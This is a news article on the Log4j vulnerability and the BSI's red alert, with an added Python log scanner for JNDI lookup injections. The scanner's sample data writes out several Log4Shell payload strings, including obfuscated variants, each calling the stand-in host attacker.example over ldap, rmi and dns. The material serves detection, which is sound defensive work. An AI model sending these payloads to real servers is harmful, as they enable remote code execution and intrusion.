BSI: Red warning level

dpa | Andrea Gillhuber

Warning about security vulnerability in server software

Invisible to Internet users, a race between IT experts and online criminals took place over the weekend. A newly discovered security vulnerability can give attackers easy access to servers. How widespread it is was initially unclear.


IT security experts are sounding the alarm about a vulnerability that threatens servers across the Internet. The German Federal Office for Information Security (BSI) raised its alert level for the vulnerability from orange to red on Saturday. There have been attack attempts around the world, some of them successful, it said. "The extent of the threat cannot currently be conclusively determined."

The vulnerability is located in a widely used library for Java software. Under certain circumstances it allows attackers to execute code of their own on the affected server, for example to install malware there. Only some versions of the library, called Log4j, are affected. However, no one has a complete overview of where the vulnerable versions of Log4j are in use.

"It is not yet known in which products this library is used, which means that it is not yet possible to estimate which products are affected by the vulnerability," the BSI cautioned. "If the manufacturers provide updates, these should be installed immediately," the agency recommended to service providers.

Log4j is a so-called logging library: it records events during server operation, as in a logbook, for later analysis of errors, for example. The vulnerability can be triggered simply by getting a specific character string written into the log. This makes it comparatively easy to exploit, which has caused great concern among experts. The problem was discovered on Thursday on servers for the online game 'Minecraft'.
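The article does not name the trigger string; it is the widely documented `${jndi:...}` lookup syntax that vulnerable Log4j versions resolve when they format a log message. As an added example, not from the article or from the Log4j project, the following Python script scans log lines for that pattern, including the common obfuscations (`${lower:j}`, `${upper:n}`, the `${key:-default}` trick) and URL-encoded variants in access logs. The log lines and the hostname `attacker.example` are constructed for this example.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample log lines for this example (not real traffic).
# attacker.example is a placeholder hostname.
SAMPLE_LOG: List[str] = [
    '10.0.0.5 - - [11/Dec/2021:09:12:01 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:09:12:07 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [11/Dec/2021:09:12:09 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [11/Dec/2021:09:12:11 +0100] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://attacker.example/c}"',
    '10.0.0.9 - - [11/Dec/2021:09:12:13 +0100] "GET /search?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 77 "-" "curl/7.79"',
    '2021-12-11 09:13:00 INFO  Search handler: user looked up "jndi documentation"',
    '2021-12-11 09:13:02 INFO  Template rendered with ${date:yyyy-MM-dd} placeholder unresolved',
]

# Innermost ${...} lookup, i.e. one with no nested braces or dollar signs inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The trigger we are hunting for once obfuscation has been collapsed.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(match: re.Match) -> str:
    """Evaluate a single innermost lookup the way the obfuscation tricks rely on."""
    body = match.group(1)
    if ":-" in body:                        # ${key:-default} -> default (key unresolved)
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):        # ${lower:J} -> j
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):        # ${upper:n} -> N
        return body[len("upper:"):].upper()
    return match.group(0)                   # unknown lookup (e.g. jndi, date): keep verbatim


def resolve_obfuscation(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups inside-out until nothing changes (bounded)."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_lookup_injection(line: str) -> bool:
    """True if the line carries a ${jndi:...} lookup, obfuscated or URL-encoded or not."""
    return JNDI_LOOKUP.search(resolve_obfuscation(unquote(line))) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_line) for every suspicious line, 1-indexed."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        if is_lookup_injection(line):
            hits.append((number, resolve_obfuscation(unquote(line))))
    return hits


if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: {decoded}")
```

On the sample above the scanner flags lines 2 to 5 and leaves the two benign lines alone: a plain mention of "jndi" without the lookup syntax, or an unrelated `${date:...}` lookup, is not a hit. The decode-then-match approach matters because a bare substring match for `jndi` is defeated by the `${lower:j}` style tricks; the normaliser keeps unknown lookups intact so the trigger itself survives to the final check.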

IT security companies and Java specialists worked over the weekend to patch the vulnerability. An update is now available for the affected versions of the open-source Log4j library, but it only protects a system once the service operator installs it. The firewall specialist Cloudflare has therefore deployed a mechanism that blocks attack attempts for its customers. Experts warned that not only online systems are at risk: a QR scanner or a contactless door lock, for example, could also be attacked if it uses Java and Log4j, Cloudflare emphasized.

The IT security industry saw a race against online criminals, who for their part are automatically searching for vulnerable servers. "At the moment, the priority is to find out how widespread the problem really is," said Rüdiger Trost from IT security company F-Secure. "Unfortunately, not only security teams but also hackers are working overtime to find the answer." Attackers could now also just use the gap to install inconspicuous backdoors for themselves, Trost warned. "The actual attacks will certainly only take place weeks or many months later."
